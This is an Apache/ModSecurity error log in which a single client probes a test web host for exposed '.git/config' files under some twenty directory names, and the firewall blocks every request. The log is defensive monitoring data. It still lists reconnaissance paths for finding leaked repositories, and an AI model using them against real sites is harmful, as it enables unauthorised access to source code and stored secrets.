[Sun Nov 17 23:56:43.323303 2024] [:error] [pid 3386427] [client 179.43.189.138:55740] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /extensions/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/extensions/.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMwAAAAI"]
[Sun Nov 17 23:56:43.323699 2024] [:error] [pid 3386427] [client 179.43.189.138:55740] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/extensions/.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMwAAAAI"]
[Sun Nov 17 23:56:43.323940 2024] [:error] [pid 3386427] [client 179.43.189.138:55740] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/extensions/.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMwAAAAI"]
[Sun Nov 17 23:56:43.342962 2024] [:error] [pid 3368396] [client 179.43.189.138:55746] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /drupal/sites/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/drupal/sites/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDgAAAAU"]
[Sun Nov 17 23:56:43.343218 2024] [:error] [pid 3368396] [client 179.43.189.138:55746] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/drupal/sites/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDgAAAAU"]
[Sun Nov 17 23:56:43.343421 2024] [:error] [pid 3368396] [client 179.43.189.138:55746] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/drupal/sites/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDgAAAAU"]
[Sun Nov 17 23:56:43.348266 2024] [:error] [pid 3372501] [client 179.43.189.138:55760] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /prestashop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prestashop/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dwAAABY"]
[Sun Nov 17 23:56:43.348517 2024] [:error] [pid 3372501] [client 179.43.189.138:55760] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prestashop/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dwAAABY"]
[Sun Nov 17 23:56:43.348745 2024] [:error] [pid 3372501] [client 179.43.189.138:55760] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prestashop/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dwAAABY"]
[Sun Nov 17 23:56:43.351088 2024] [:error] [pid 3370338] [client 179.43.189.138:55776] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /docs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docs/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMawAAAAc"]
[Sun Nov 17 23:56:43.351324 2024] [:error] [pid 3370338] [client 179.43.189.138:55776] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docs/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMawAAAAc"]
[Sun Nov 17 23:56:43.351533 2024] [:error] [pid 3370338] [client 179.43.189.138:55776] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docs/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMawAAAAc"]
[Sun Nov 17 23:56:43.356263 2024] [:error] [pid 3386431] [client 179.43.189.138:55784] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /documentation/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/documentation/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7wAAAAg"]
[Sun Nov 17 23:56:43.356432 2024] [:error] [pid 3386431] [client 179.43.189.138:55784] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/documentation/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7wAAAAg"]
[Sun Nov 17 23:56:43.356600 2024] [:error] [pid 3386431] [client 179.43.189.138:55784] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/documentation/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7wAAAAg"]
[Sun Nov 17 23:56:43.359259 2024] [:error] [pid 3372499] [client 179.43.189.138:55796] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zeQAAABQ"]
[Sun Nov 17 23:56:43.359435 2024] [:error] [pid 3372499] [client 179.43.189.138:55796] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zeQAAABQ"]
[Sun Nov 17 23:56:43.359609 2024] [:error] [pid 3372499] [client 179.43.189.138:55796] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zeQAAABQ"]
[Sun Nov 17 23:56:43.377595 2024] [:error] [pid 3372496] [client 179.43.189.138:55802] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8iQAAABA"]
[Sun Nov 17 23:56:43.377834 2024] [:error] [pid 3372496] [client 179.43.189.138:55802] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8iQAAABA"]
[Sun Nov 17 23:56:43.378041 2024] [:error] [pid 3372496] [client 179.43.189.138:55802] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8iQAAABA"]
[Sun Nov 17 23:56:43.384580 2024] [authz_core:error] [pid 3372502] [client 179.43.189.138:55818] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.git
[Sun Nov 17 23:56:43.386342 2024] [:error] [pid 3372498] [client 179.43.189.138:55828] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /bower_components/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/bower_components/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbgAAABM"]
[Sun Nov 17 23:56:43.386554 2024] [:error] [pid 3372498] [client 179.43.189.138:55828] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/bower_components/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbgAAABM"]
[Sun Nov 17 23:56:43.386743 2024] [:error] [pid 3372498] [client 179.43.189.138:55828] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/bower_components/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbgAAABM"]
[Sun Nov 17 23:56:43.393277 2024] [:error] [pid 3372500] [client 179.43.189.138:55830] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JgAAABU"]
[Sun Nov 17 23:56:43.393801 2024] [:error] [pid 3372500] [client 179.43.189.138:55830] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JgAAABU"]
[Sun Nov 17 23:56:43.394194 2024] [:error] [pid 3372500] [client 179.43.189.138:55830] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JgAAABU"]
[Sun Nov 17 23:56:43.394622 2024] [:error] [pid 3386427] [client 179.43.189.138:55836] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shared/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctNAAAAAI"]
[Sun Nov 17 23:56:43.394855 2024] [:error] [pid 3386427] [client 179.43.189.138:55836] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctNAAAAAI"]
[Sun Nov 17 23:56:43.395068 2024] [:error] [pid 3386427] [client 179.43.189.138:55836] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctNAAAAAI"]
[Sun Nov 17 23:56:43.412591 2024] [:error] [pid 3368396] [client 179.43.189.138:55838] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDwAAAAU"]
[Sun Nov 17 23:56:43.412900 2024] [:error] [pid 3368396] [client 179.43.189.138:55838] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDwAAAAU"]
[Sun Nov 17 23:56:43.413168 2024] [:error] [pid 3368396] [client 179.43.189.138:55838] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDwAAAAU"]
[Sun Nov 17 23:56:43.421095 2024] [:error] [pid 3370338] [client 179.43.189.138:55858] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /dist/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dist/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMbAAAAAc"]
[Sun Nov 17 23:56:43.421368 2024] [:error] [pid 3370338] [client 179.43.189.138:55858] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dist/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMbAAAAAc"]
[Sun Nov 17 23:56:43.421599 2024] [:error] [pid 3370338] [client 179.43.189.138:55858] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dist/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMbAAAAAc"]
[Sun Nov 17 23:56:43.422591 2024] [:error] [pid 3372501] [client 179.43.189.138:55848] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cache/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cache/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5eAAAABY"]
[Sun Nov 17 23:56:43.422977 2024] [:error] [pid 3372501] [client 179.43.189.138:55848] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cache/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5eAAAABY"]
[Sun Nov 17 23:56:43.423279 2024] [:error] [pid 3372501] [client 179.43.189.138:55848] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cache/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5eAAAABY"]
